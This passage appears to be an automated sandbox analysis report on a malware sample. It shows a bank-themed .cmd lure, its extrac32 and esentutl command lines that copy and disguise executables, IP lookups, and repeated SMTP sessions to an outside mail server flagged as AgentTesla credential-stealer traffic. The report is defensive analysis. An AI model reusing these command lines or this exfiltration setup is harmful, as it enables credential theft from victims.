2024-11-13 15:28:03 UTC	16384	IN	Data Raw: 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 Data Ascii: 6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqy
2024-11-13 15:28:03 UTC	16384	IN	Data Raw: 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 Data Ascii: rm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52e
2024-11-13 15:28:03 UTC	387	IN	Data Raw: 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 Data Ascii: KWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisrip

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	104.26.12.205	443	6564	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 15:28:15 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-13 15:28:15 UTC	397	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 15:28:15 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e1fca610d8c943e-SJC server-timing: cfL4;desc="?proto=TCP&rtt=39321&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=73603&cwnd=32&unsent_bytes=0&cid=eb3f7927beff8025&ts=384&x=0"
2024-11-13 15:28:15 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 Data Ascii: 173.254.250.82

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49755	104.26.12.205	443	7536	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 15:28:26 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-13 15:28:26 UTC	399	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 15:28:26 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e1fcaa73d7f0c07-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1419&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=2035137&cwnd=245&unsent_bytes=0&cid=efa4cf25148cedbd&ts=235&x=0"
2024-11-13 15:28:26 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 Data Ascii: 173.254.250.82

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49791	104.26.12.205	443	7824	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 15:28:35 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-13 15:28:36 UTC	397	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 15:28:36 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e1fcae1494d643e-SJC server-timing: cfL4;desc="?proto=TCP&rtt=41210&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=70362&cwnd=32&unsent_bytes=0&cid=7e4f2c58643e2b86&ts=565&x=0"
2024-11-13 15:28:36 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 Data Ascii: 173.254.250.82

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 13, 2024 16:28:18.608449936 CET	587	49708	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:18 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:28:18.608804941 CET	49708	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:28:18.849797964 CET	587	49708	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:28:18.856316090 CET	49708	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:28:19.098189116 CET	587	49708	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:28:22.621243000 CET	587	49731	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:22 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:28:22.621380091 CET	49731	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:28:22.869749069 CET	587	49731	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:28:22.869888067 CET	49731	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:28:23.119683027 CET	587	49731	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:28:29.391102076 CET	587	49767	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:29 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:28:29.391350985 CET	49767	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:28:29.630789995 CET	587	49767	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:28:29.630927086 CET	49767	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:28:29.871548891 CET	587	49767	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:28:34.571944952 CET	587	49786	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:34 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:28:34.978404045 CET	587	49786	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:34 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:28:37.976600885 CET	587	49802	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:37 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:28:37.976844072 CET	49802	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:28:38.221750021 CET	587	49802	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:28:38.251254082 CET	49802	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:28:38.495523930 CET	587	49802	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:28:41.982292891 CET	587	49823	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:41 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:28:41.982430935 CET	49823	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:28:42.223768950 CET	587	49823	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:28:42.223901987 CET	49823	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:28:42.465934992 CET	587	49823	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:30:25.439933062 CET	587	49988	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:30:25 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:30:25.440191984 CET	49988	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:30:25.679569960 CET	587	49988	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:30:25.679738998 CET	49988	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:30:25.920582056 CET	587	49988	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:30:37.045639992 CET	587	49989	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:30:36 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:30:37.049530983 CET	49989	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:30:37.295859098 CET	587	49989	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:30:37.301501036 CET	49989	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:30:37.551120043 CET	587	49989	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:30:47.764328003 CET	587	49990	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:30:47 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:30:47.764468908 CET	49990	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:30:48.016486883 CET	587	49990	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:30:48.016642094 CET	49990	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:30:48.261116028 CET	587	49990	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:31:01.417921066 CET	587	49991	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:01 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:31:01.418292999 CET	49991	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:31:01.658363104 CET	587	49991	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:31:01.658621073 CET	49991	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:31:01.899732113 CET	587	49991	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:31:10.206183910 CET	587	49992	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:10 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:31:10.206530094 CET	49992	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:31:10.451833010 CET	587	49992	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:31:10.452092886 CET	49992	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:31:10.698582888 CET	587	49992	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:31:22.510297060 CET	587	49993	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:22 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:31:22.510445118 CET	49993	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:31:22.754071951 CET	587	49993	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:31:22.757504940 CET	49993	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:31:23.001008987 CET	587	49993	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:31:25.198313951 CET	587	49994	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:25 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:31:25.198990107 CET	49994	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:31:25.441014051 CET	587	49994	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:31:25.441217899 CET	49994	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:31:25.685184002 CET	587	49994	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:31:32.891438961 CET	587	49995	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:32 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:31:32.904699087 CET	49995	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:31:33.143227100 CET	587	49995	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:31:33.145606995 CET	49995	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:31:33.402697086 CET	587	49995	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:31:45.756318092 CET	587	49996	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:45 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:31:45.756483078 CET	49996	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:31:45.999854088 CET	587	49996	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:31:46.000022888 CET	49996	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:31:46.243091106 CET	587	49996	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:31:49.321707010 CET	587	49997	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:48 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:31:49.326919079 CET	49997	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:31:49.574918985 CET	587	49997	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:31:49.577560902 CET	49997	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:31:49.826091051 CET	587	49997	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:31:53.996834040 CET	587	49998	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:53 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:31:53.996993065 CET	49998	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:31:54.239223957 CET	587	49998	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:31:54.239590883 CET	49998	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:31:54.481161118 CET	587	49998	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 13, 2024 16:32:13.574069977 CET	587	49999	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:32:13 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 13, 2024 16:32:13.574223042 CET	49999	587	192.168.2.5	51.195.88.199	EHLO 675052
Nov 13, 2024 16:32:13.819650888 CET	587	49999	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 675052 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 13, 2024 16:32:13.820188046 CET	49999	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 13, 2024 16:32:14.077152014 CET	587	49999	51.195.88.199	192.168.2.5	220 TLS go ahead

Target ID:	0
Start time:	10:27:59
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "
Imagebase:	0x7ff643a50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:27:59
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:27:59
Start date:	13/11/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x7ff6cf1e0000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:27:59
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x400000
File size:	1'224'192 bytes
MD5 hash:	86EE0E8789E9C11F707D056C4052292E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:28:08
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:28:08
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:28:09
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase:	0x220000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:28:10
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Imagebase:	0x220000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:28:10
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:28:10
Start date:	13/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:28:11
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0x540000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2337075849.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Author: 